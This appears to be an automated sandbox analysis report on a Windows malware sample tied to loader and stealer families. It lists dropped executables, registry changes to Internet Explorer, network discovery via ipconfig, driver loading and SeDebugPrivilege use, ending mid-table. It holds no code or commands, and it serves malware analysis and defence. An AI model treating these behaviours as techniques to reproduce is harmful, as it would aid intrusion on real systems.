Analysis Overview
SHA256
3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e
Threat Level: Shows suspicious behavior
The file 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Gathers network information
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-03 05:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-03 05:54
Reported
2025-07-03 05:57
Platform
win10v2004-20250619-en
Max time kernel
149s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_eywqoigbyt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qkicavsnlf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qkicavsnlf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfdxvpnifa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_causmkecxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\fzxrpkhczu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_wrpjhbzurm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_rmjecwuomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qljdbvtnlg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\igbytrljdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\oigaytqljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_oigaytqljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_causmkfcxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ecwupmhfzx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_bztrljebwu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_igbytrljdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_igaysqlida.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ywqojgbztr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\eywqoigbyt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\sqlidavtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_fzxrpkhczu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wrpjhbzurm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\faysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_faysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfcxupnhfz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\yvqoigaytq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\temp\CreateProcess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\causmkecxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rmjecwuomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\causmkfcxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfcxupnhfz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ecwupmhfzx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ywqojgbztr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\gaysqlidbvtnlfdy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\pnhfaxsqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_pnhfaxsqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qljdbvtnlg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfdxvpnifa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\igaysqlida.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_yvqoigaytq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_sqlidavtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\bztrljebwu.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000001ae698d4dc529193fb739ab8579f60fa89deabab4fad6ddd6edeb4f45ce795ed000000000e80000000020000200000002e8ee7a93441166102f27d01a6a7837e7d1296bad16575d9d6b71516b2879f742000000007cbd71f6faab943dd1d2e622521a82759c6c966dd6a94ab8f8addb25db88ef4400000009cd7db07d183aa9b3e4cac3103d21df5e463a728d2abc94814c237dfa751475dea760d43639dc9512a7add064e275d65ad713e3280b7ff7d9640c472c3790186 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002d5f9b32d7ad8579c51ae169a6dc60375a45fb02a867a31606039991b5194a8c000000000e8000000002000020000000cff5908bbb0d5d263fc143d5b81d3f9a3b750b03998948d7dc792cda422e49da100000004f5ed7be25e1a14a723f1fad7efabc3940000000baf41d9eaf9f33413272e4fcfb3ebc202320698ee560753097956d0e9b26d7196de8df76a2a8aa955ce3c4b28ced1df536edb7a80d45743992f5d9bd64779360 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30aa6f17dfebdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4240665B-57D2-11F0-9B6E-C2DCADC1FE9C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "381482518" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301b7217dfebdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287076" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IENTSS" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000982d4e763a2bc45f97f3ff8192843bb23c58052dfa046135ca5da319caac0cf6000000000e80000000020000200000008c2d350cd3a022671bc1ce2df317819bae5c8ed478b63743175ae4ba10ff50bf10000000201e76672764b644cd70862453ddcd994000000062a78e5998df3a809e6938956f968b19edb66b27b0a370108d5f45ed0a969ebc128049774748dff5b54055bd7e183618b44c8cbd4a0317cde9ab6f42b0ddd44e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000007c1347e0c0c896f52b4de36f1193825bc56f040fb55b3213222cadaafd52aac9000000000e8000000002000020000000c8623b68226d9233f7e8207f8c5f580880b08140ddad5c75bf2b165ef73c0cf6200000005bb4925abccb4b758a12d434b5d0e0f6ed363482f1ac340c8e599e21c3611b0040000000e3c6c29f2d77c0a6cac0cc8e04326734e2308c8ab897945a7115fa00dedb1efca733dc353012f7858a69fcc91d03b36b0e7dca0d3e89e20880aaf50d0192657f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d50000000002000000000010660000000100002000000041dc704ab36e0add88a6caf05c00beae80045c9edf226ad742e63e02b95c84d9000000000e8000000002000020000000eb11c7d67b4830c78b40ab93a833ca0b2479fdfe23e4ebe29d0a157b17ae76fa50000000982cd855615be313183460179497121b9259d52587a3b0ad3f78d1330a3c97d708987efafd75fa8287da0edd777eb02234ef8550771703a1d0c1b102c054fc7b5c65da49ea39c5c584708e48966cfff04000000007fdd54d917fb0cf5b7e1e2b1d15bc759400a2abd40d41a46b509daa907ecc1aa49e592a3df0fdc1875ea1c9723f8145126f07c8702750142776748bb2ec604a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000a137aec44824d0334289144516214a0a1ad2ce35f8393056bdc68bfca86a6823000000000e80000000020000200000006748049c4895b5f563b3ebb2cbe1ede46385bb9831465a8b554241cc7035c32a500000001db58fa578243a002515ca100cc0f97d02a6349642df5dade3304ba277e7bfebb4afd4fc7f7e5d0a687ad9539d4fd1b91b6edfff0a2c68c99ed893d6123112ea552b3393224949380f400afe0018fa554000000001b1fb60c275d032dfc8ee8d4f351ff4646a733fc85d7305f0baf8ac7b8b69056490ff2227a9a768157572616a340c7f81d03d143eba97d63de3633a02609b3b | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "385700650" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qljdbvtnlg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qkicavsnlf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kfdxvpnifa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_causmkecxu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_fzxrpkhczu.exe | N/A |
